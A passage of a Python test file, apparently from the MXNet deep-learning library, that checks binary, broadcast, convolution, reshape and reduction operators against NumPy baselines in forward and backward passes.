b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
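# Input generators for the binary / broadcast operator checks: a fixed list of
# broadcastable shape pairs first, then random shapes once the list is exhausted.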
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
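# Forward check for a binary symbol against a NumPy baseline; on mismatch the
# offending values (including their hex bit patterns) are logged before failing.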
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
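    """Compare the backward pass of `symbol` against `baseline`, which maps
    (out_grad, a, b) to the gradients w.r.t. both inputs; broadcast axes are
    summed out before the comparison."""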
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
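            # Sum the full-shape gradient over the axes that were broadcast so it
            # matches the original input shape.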
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
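    """Feed a unit impulse through a dilated convolution with all-ones weights and
    check that the response (and the input gradient) sums to the kernel size, then
    do a first-order check of the kernel gradient with a random kernel."""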
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
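        """Reshape `src_shape` with `shape_args` (optionally with reverse=True), check that
        the inferred output shape equals `dst_shape`, and check that forward/backward are
        pure reshapes of the data; also exercise shape inference with one source dim left
        unknown (0)."""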
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
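    # Each case is (src_shape, shape_args, reverse, expected_dst_shape). The special
    # codes in shape_args follow mx.sym.Reshape: 0 keeps the input dim, -1 infers it,
    # -2 copies the remaining dims, -3 merges two consecutive dims, -4 splits a dim
    # into the next two values (one of which may be -1).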
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
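    # Each case is (lhs_shape, rhs_shape, lhs_begin, lhs_end, rhs_begin, rhs_end,
    # expected_dst_shape); None means the default begin/end of reshape_like.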
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
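        """Check an mxnet reduction symbol against `numpy_reduce_func` and its gradient
        against `numpy_reduce_grad_func` on random shapes, random axes (optionally via
        exclude=True), random keepdims, and optionally NaN-contaminated data."""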
for i in range(sample_num):
            # Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
